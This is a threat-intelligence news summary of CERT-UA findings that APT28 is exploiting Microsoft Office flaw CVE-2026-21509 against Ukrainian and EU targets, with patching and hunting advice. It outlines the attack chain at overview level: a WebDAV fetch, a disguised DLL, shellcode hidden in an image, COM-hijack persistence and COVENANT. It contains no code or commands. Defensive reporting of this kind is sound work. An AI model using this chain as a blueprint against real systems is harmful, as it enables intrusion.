Russia-linked APT28 attackers already abusing new Microsoft Office zero-day
Summary
Ukraine’s CERT (CERT-UA) reports that Russia-linked APT28 (aka Fancy Bear / UAC-0001) is actively exploiting a Microsoft Office security feature bypass, CVE-2026-21509. Weaponised documents appeared within days of Microsoft’s disclosure: phishing emails delivered malicious DOC attachments that trigger a WebDAV fetch, download a shortcut, deploy a DLL disguised as a Windows component and load shellcode hidden in an image file. Attackers establish persistence via COM hijacking and a scheduled task that restarts explorer.exe, then deploy the COVENANT post-exploitation framework. Traffic is routed through legitimate cloud storage to blend in. CERT-UA found campaigns targeting Ukrainian government bodies and organisations across EU member states and warns that rapid infrastructure churn and slow patch uptake will likely increase attacks.
Key Points
- Threat actor: APT28 (Fancy Bear / UAC-0001) is confirmed using CVE-2026-21509 in live campaigns.
- Timeline: A weaponised document was publicly observed within days of Microsoft’s disclosure, indicating pre-prepared exploit chains.
- Infection chain: malicious DOC → WebDAV fetch → downloaded shortcut → DLL masquerade + shellcode in an image → persistence via COM hijack and scheduled task.
- Post-exploitation: attackers deploy the COVENANT framework and route traffic via legitimate cloud storage to avoid detection.
- Targets: Ukrainian central government bodies and organisations in EU member states; phishing themes impersonated official Ukrainian services.
- Infrastructure tactics: payload domains registered and used the same day, showing fast cycling of infrastructure.
- Mitigation: Microsoft has released patches (including for older builds), but CERT-UA warns patch rollout/inertia will delay protection — defenders should monitor/block Filen-related traffic and hunt for the described indicators.
Why should I read this?
Because this one’s live and nasty — a big-name nation-state group turned a patch notice into a working exploit in days. If you run Office, get patches in, scan for weird WebDAV/shortcut activity and don’t assume cloud traffic is harmless. We read the messy details so you don’t have to — but you should act.
Author style
Punchy: urgent, short, and actionable. This is high-priority intelligence — patch, detect, and hunt now. If you manage security for organisations in Europe or work with Ukrainian partners, treat the technical details here as immediate telemetry to act on.
Context and relevance
This story matters because it illustrates a now-familiar pattern: zero-days are weaponised extremely quickly by sophisticated state-aligned actors and abused via Office documents — a long-standing, high-value vector. It underlines two persistent issues for defenders: the speed of exploit development and the practical difficulties organisations face in rolling out patches or adopting recommended mitigations. Expect more rapid reuse of disclosed flaws and continued blending of malicious traffic through legitimate services.